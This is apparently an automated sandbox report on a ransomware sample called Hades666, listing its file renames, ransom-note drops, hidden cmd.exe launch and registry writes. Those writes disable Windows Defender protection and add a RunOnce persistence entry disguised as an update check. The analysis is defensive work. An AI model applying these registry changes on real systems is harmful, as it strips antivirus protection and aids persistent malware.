Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemDisplay.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemInfo.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePCSystemShellMode.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyAccountInfo.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCalendar.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCallHistory.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyContacts.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyCustomPeripherals.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyEmail.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyGeneral.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPagePrivacyLocation.settingcontent-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Move C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\fRSFPyN.avi.Hades666 source_filename = C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\fRSFPyN.avi, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
For performance reasons, the remaining 2806 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (11)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\HomeGroup - True 1
Fn
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender - True 1
Fn
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager - True 1
Fn
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\HomeGroup value_name = DisableHomeGroup, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender value_name = DisableAntiSpyware, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value_name = DisableRealtimeMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value_name = DisableBehaviorMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value_name = DisableOnAccessProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce value_name = WindowsUpdateCheck, data = C:\Users\FD1HVy\Desktop\Hades666.exe, size = 72, type = REG_SZ True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\WINDOWS\system32\cmd.exe os_pid = 0xcb8, show_window = SW_HIDE True 1
Fn
Module (2016)
»
Operation Module Additional Information Success Count Logfile
Load api-ms-win-core-synch-l1-2-0 base_address = 0x74ea0000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x74ea0000 True 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x74ea0000 True 1
Fn
Load kernel32 base_address = 0x75e90000 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\hades666.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Hades666.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = InitializeCriticalSectionEx, address_out = 0x74f97060 True 2
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = FlsAlloc, address_out = 0x74f9bea0 True 2
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = FlsSetValue, address_out = 0x74f92550 True 2
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = FlsGetValue, address_out = 0x74f870c0 True 1
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = LCMapStringEx, address_out = 0x74f7ed00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x75ea4280 True 1
Fn
Create Mapping Z:\HOW TO BACK YOUR FILES.txt filename = Z:\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping Z:\System Volume Information\tracking.log filename = Z:\System Volume Information\tracking.log, protection = PAGE_READWRITE, maximum_size = 21248 True 1
Fn
Create Mapping C:\BOOTNXT filename = C:\BOOTNXT, protection = PAGE_READWRITE, maximum_size = 784 True 1
Fn
Create Mapping C:\HOW TO BACK YOUR FILES.txt filename = C:\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\bootsect.exe filename = C:\Windows10Upgrade\bootsect.exe, protection = PAGE_READWRITE, maximum_size = 119248 True 1
Fn
Create Mapping C:\Windows10Upgrade\DW20.EXE filename = C:\Windows10Upgrade\DW20.EXE, protection = PAGE_READWRITE, maximum_size = 644560 True 1
Fn
Create Mapping Z:\Recovery\HOW TO BACK YOUR FILES.txt filename = Z:\Recovery\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\boot.sdi filename = Z:\Recovery\WindowsRE\boot.sdi, protection = PAGE_READWRITE, maximum_size = 3171072 True 1
Fn
Create Mapping C:\Windows10Upgrade\DWTRIG20.EXE filename = C:\Windows10Upgrade\DWTRIG20.EXE, protection = PAGE_READWRITE, maximum_size = 46544 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\ReAgent.xml filename = Z:\Recovery\WindowsRE\ReAgent.xml, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\Winre.wim filename = Z:\Recovery\WindowsRE\Winre.wim, protection = PAGE_READWRITE, maximum_size = 491778272 True 1
Fn
Create Mapping C:\Windows10Upgrade\EnableWiFiTracing.cmd filename = C:\Windows10Upgrade\EnableWiFiTracing.cmd, protection = PAGE_READWRITE, maximum_size = 10592 True 1
Fn
Create Mapping C:\Windows10Upgrade\GatherOSState.EXE filename = C:\Windows10Upgrade\GatherOSState.EXE, protection = PAGE_READWRITE, maximum_size = 565712 True 1
Fn
Create Mapping C:\Windows10Upgrade\GetCurrentRollback.EXE filename = C:\Windows10Upgrade\GetCurrentRollback.EXE, protection = PAGE_READWRITE, maximum_size = 74192 True 1
Fn
Create Mapping C:\Windows10Upgrade\HttpHelper.exe filename = C:\Windows10Upgrade\HttpHelper.exe, protection = PAGE_READWRITE, maximum_size = 28624 True 1
Fn
Create Mapping C:\Windows10Upgrade\PostOOBEScript.cmd filename = C:\Windows10Upgrade\PostOOBEScript.cmd, protection = PAGE_READWRITE, maximum_size = 1360 True 1
Fn
Create Mapping C:\Windows10Upgrade\upgrader_default.log filename = C:\Windows10Upgrade\upgrader_default.log, protection = PAGE_READWRITE, maximum_size = 250960 True 1
Fn
Create Mapping C:\Windows10Upgrade\upgrader_win10.log filename = C:\Windows10Upgrade\upgrader_win10.log, protection = PAGE_READWRITE, maximum_size = 21328 True 1
Fn
Create Mapping C:\Windows10Upgrade\Windows10UpgraderApp.exe filename = C:\Windows10Upgrade\Windows10UpgraderApp.exe, protection = PAGE_READWRITE, maximum_size = 1416656 True 1
Fn
Create Mapping C:\Windows10Upgrade\WinREBootApp32.exe filename = C:\Windows10Upgrade\WinREBootApp32.exe, protection = PAGE_READWRITE, maximum_size = 26064 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt filename = Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\WinREBootApp64.exe filename = C:\Windows10Upgrade\WinREBootApp64.exe, protection = PAGE_READWRITE, maximum_size = 26576 True 1
Fn
Create Mapping C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\hwcompatShared.txt filename = C:\Windows10Upgrade\resources\hwcompatShared.txt, protection = PAGE_READWRITE, maximum_size = 826144 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\block.png filename = C:\Windows10Upgrade\resources\ux\block.png, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\bluelogo.png filename = C:\Windows10Upgrade\resources\ux\bluelogo.png, protection = PAGE_READWRITE, maximum_size = 7856 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\bullet.png filename = C:\Windows10Upgrade\resources\ux\bullet.png, protection = PAGE_READWRITE, maximum_size = 992 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default.css filename = C:\Windows10Upgrade\resources\ux\default.css, protection = PAGE_READWRITE, maximum_size = 6544 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default.htm filename = C:\Windows10Upgrade\resources\ux\default.htm, protection = PAGE_READWRITE, maximum_size = 63312 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_eos.css filename = C:\Windows10Upgrade\resources\ux\default_eos.css, protection = PAGE_READWRITE, maximum_size = 7472 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_eos.htm filename = C:\Windows10Upgrade\resources\ux\default_eos.htm, protection = PAGE_READWRITE, maximum_size = 56640 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_oobe.css filename = C:\Windows10Upgrade\resources\ux\default_oobe.css, protection = PAGE_READWRITE, maximum_size = 6000 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_oobe.htm filename = C:\Windows10Upgrade\resources\ux\default_oobe.htm, protection = PAGE_READWRITE, maximum_size = 66480 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\eula.css filename = C:\Windows10Upgrade\resources\ux\eula.css, protection = PAGE_READWRITE, maximum_size = 864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\GetStarted.png filename = C:\Windows10Upgrade\resources\ux\GetStarted.png, protection = PAGE_READWRITE, maximum_size = 4592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png filename = C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png, protection = PAGE_READWRITE, maximum_size = 4848 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\loading.gif filename = C:\Windows10Upgrade\resources\ux\loading.gif, protection = PAGE_READWRITE, maximum_size = 18176 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\lock.png filename = C:\Windows10Upgrade\resources\ux\lock.png, protection = PAGE_READWRITE, maximum_size = 4448 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\logo.png filename = C:\Windows10Upgrade\resources\ux\logo.png, protection = PAGE_READWRITE, maximum_size = 3392 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\marketing.png filename = C:\Windows10Upgrade\resources\ux\marketing.png, protection = PAGE_READWRITE, maximum_size = 1264 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht filename = C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht, protection = PAGE_READWRITE, maximum_size = 622864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png filename = C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png, protection = PAGE_READWRITE, maximum_size = 2944 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png filename = C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png, protection = PAGE_READWRITE, maximum_size = 2992 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\pass.png filename = C:\Windows10Upgrade\resources\ux\pass.png, protection = PAGE_READWRITE, maximum_size = 2592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js, protection = PAGE_READWRITE, maximum_size = 1284304 True 1
Fn
Create Mapping C:\Documents and Settings\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\Public\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\Public\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\Public\Videos\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\Public\Videos\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\Public\Pictures\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\Public\Pictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\Public\Music\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\Public\Music\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\Public\Libraries\RecordedTV.library-ms filename = C:\Documents and Settings\Public\Libraries\RecordedTV.library-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\Public\Libraries\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\Public\Libraries\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\Public\Downloads\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\Public\Downloads\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\Public\Documents\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\Public\Documents\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\Public\Desktop\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\Public\Desktop\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\Public\AccountPictures\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\Public\AccountPictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\gYIUr9Yr elVWW.avi filename = C:\Documents and Settings\FD1HVy\Videos\gYIUr9Yr elVWW.avi, protection = PAGE_READWRITE, maximum_size = 73008 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\YWO_sNg OefAE_5w.avi filename = C:\Documents and Settings\FD1HVy\Videos\YWO_sNg OefAE_5w.avi, protection = PAGE_READWRITE, maximum_size = 90720 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\3tzadavEENh.mp4 filename = C:\Documents and Settings\FD1HVy\Videos\9ons\3tzadavEENh.mp4, protection = PAGE_READWRITE, maximum_size = 91024 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\EGhknK0b5TkYm2.mkv filename = C:\Documents and Settings\FD1HVy\Videos\9ons\EGhknK0b5TkYm2.mkv, protection = PAGE_READWRITE, maximum_size = 67200 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\Jua Yx5oT-TmG.flv filename = C:\Documents and Settings\FD1HVy\Videos\9ons\Jua Yx5oT-TmG.flv, protection = PAGE_READWRITE, maximum_size = 39760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\MEEOu Zp.swf filename = C:\Documents and Settings\FD1HVy\Videos\9ons\MEEOu Zp.swf, protection = PAGE_READWRITE, maximum_size = 66672 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Videos\9ons\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\c2-bZv.mp4 filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\c2-bZv.mp4, protection = PAGE_READWRITE, maximum_size = 54032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\WtGTr5oSkY4b2z.swf filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\WtGTr5oSkY4b2z.swf, protection = PAGE_READWRITE, maximum_size = 86288 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\yfsh F2f2ESnkdaLoItR.mp4 filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\yfsh F2f2ESnkdaLoItR.mp4, protection = PAGE_READWRITE, maximum_size = 17056 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\YnRZ94SS8kLJlH.swf filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\YnRZ94SS8kLJlH.swf, protection = PAGE_READWRITE, maximum_size = 37024 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\_g-1teoG7j3v Y5dWV.mp4 filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\_g-1teoG7j3v Y5dWV.mp4, protection = PAGE_READWRITE, maximum_size = 18896 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\6hXid1btCJcj.mp4 filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\6hXid1btCJcj.mp4, protection = PAGE_READWRITE, maximum_size = 46368 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\7GbHOe1SSO.swf filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\7GbHOe1SSO.swf, protection = PAGE_READWRITE, maximum_size = 46720 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\8EcMJo7Wsy.mkv filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\8EcMJo7Wsy.mkv, protection = PAGE_READWRITE, maximum_size = 32000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\MgmW jtwFQJ_.mp4 filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\MgmW jtwFQJ_.mp4, protection = PAGE_READWRITE, maximum_size = 3680 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\ON2nN.swf filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\ON2nN.swf, protection = PAGE_READWRITE, maximum_size = 11072 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\pAB-zP5fxaHcexmF.mkv filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\pAB-zP5fxaHcexmF.mkv, protection = PAGE_READWRITE, maximum_size = 53648 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\my3r vfCzZrQ-.swf filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\my3r vfCzZrQ-.swf, protection = PAGE_READWRITE, maximum_size = 75168 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\qHSU3A- l4yAMtggXeQ.flv filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\qHSU3A- l4yAMtggXeQ.flv, protection = PAGE_READWRITE, maximum_size = 62368 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\waEwyjT9rU.avi filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\waEwyjT9rU.avi, protection = PAGE_READWRITE, maximum_size = 84192 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\ITXjK9.swf filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\ITXjK9.swf, protection = PAGE_READWRITE, maximum_size = 78848 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\W7uzAf.flv filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\W7uzAf.flv, protection = PAGE_READWRITE, maximum_size = 49088 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\yN3jjUv7Vb.avi filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\yN3jjUv7Vb.avi, protection = PAGE_READWRITE, maximum_size = 73136 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
